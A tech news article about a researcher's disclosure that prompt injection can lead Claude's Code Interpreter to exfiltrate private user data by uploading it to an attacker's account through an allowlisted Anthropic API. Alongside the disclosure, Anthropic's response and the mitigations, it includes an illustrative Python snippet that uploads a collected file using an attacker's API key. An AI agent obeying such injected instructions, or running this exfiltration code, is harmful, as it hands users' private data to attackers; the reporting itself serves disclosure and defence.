- Claude’s Code Interpreter can be exploited to exfiltrate private user data via prompt injection
- A researcher tricked Claude into uploading sandboxed data to his own Anthropic account via the model’s API access
- Anthropic now treats such vulnerabilities as reportable and encourages users to monitor Claude or disable network access
Claude, one of the more popular AI tools out there, has a vulnerability that allows threat actors to steal private user data, experts have warned.
Cybersecurity researcher Johann Rehberger, AKA Wunderwuzzi, recently published an in-depth report on his findings. The root of the problem is Claude’s Code Interpreter, a sandboxed environment that lets the AI write and run code (for example, to analyze data or generate files) directly in a conversation.
Recently, Code Interpreter gained the ability to make network requests, which makes it possible to connect to the Internet and, for example, download software packages.
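To give a sense of what that looks like in practice, here is a minimal, purely illustrative sketch of the kind of code the interpreter can now run once network access is enabled. The package name is arbitrary, and PyPI is assumed to be on the default allowlist.

```python
# Illustrative only: code of this kind, run inside Claude's Code Interpreter,
# can reach approved hosts such as PyPI once network access is enabled.
import subprocess

# Install an arbitrary package from PyPI (one of the allowlisted domains).
subprocess.run(["pip", "install", "requests"], check=True)
```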
Keeping an eye on Claude
By default, Claude’s sandbox is supposed to have access only to “secure” domains such as GitHub or PyPI, but the approved list also includes api.anthropic.com (the same API Claude itself uses), and that is what opened the door for exploitation.
Wunderwuzzi showed that he could trick Claude into reading private user data, storing it inside the sandbox, and then uploading it to his own Anthropic account via Claude’s Files API, authenticated with his (the attacker’s) API key.
In other words, even if network access appears to be limited, an attacker can manipulate the model via prompt injection to exfiltrate user data. The exploit could transfer up to 30MB per file, and multiple files could be uploaded.
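To make the mechanics concrete, below is a minimal, hypothetical sketch of what the final exfiltration step might look like: code running inside the sandbox pushes a previously written file to the Anthropic Files API using an attacker-supplied key. The endpoint, headers, and file path are assumptions based on Anthropic’s public Files API documentation, not details taken from Rehberger’s report.

```python
# Hypothetical sketch of the exfiltration step described above: code running
# inside Claude's sandbox uploads a file it has already written, but it
# authenticates with the ATTACKER's API key, so the file lands in the
# attacker's Anthropic account rather than the victim's.
# Endpoint and headers are assumptions drawn from Anthropic's public
# Files API documentation; they are not taken from the report.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # attacker-controlled key smuggled in via prompt injection

with open("/tmp/collected_chat_data.txt", "rb") as f:  # data gathered earlier in the conversation
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": ("notes.txt", f, "text/plain")},  # uploads capped at roughly 30MB each
        timeout=30,
    )

resp.raise_for_status()
print(resp.json()["id"])  # the file now sits in the attacker's account
```

Because api.anthropic.com is on the default allowlist, a request like this is hard to distinguish from Claude’s own legitimate API traffic.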
Wunderwuzzi disclosed his findings to Anthropic via HackerOne, and while the company initially classified it as a “model security issue,” not a “security vulnerability,” it later acknowledged that such exfiltration flaws are in scope for reporting. At first, Anthropic said users should “monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly.”
A subsequent update to the report reads: “Anthropic has confirmed that data exfiltration vulnerabilities like this are within the scope of reporting and this issue should not have been closed as out of scope. There was a problem in the process that they will work to resolve.”
He suggests that Anthropic restrict the sandbox’s API traffic to the user’s own account, and advises users to monitor Claude’s activity closely, or disable network access entirely if they are concerned.
Via The Register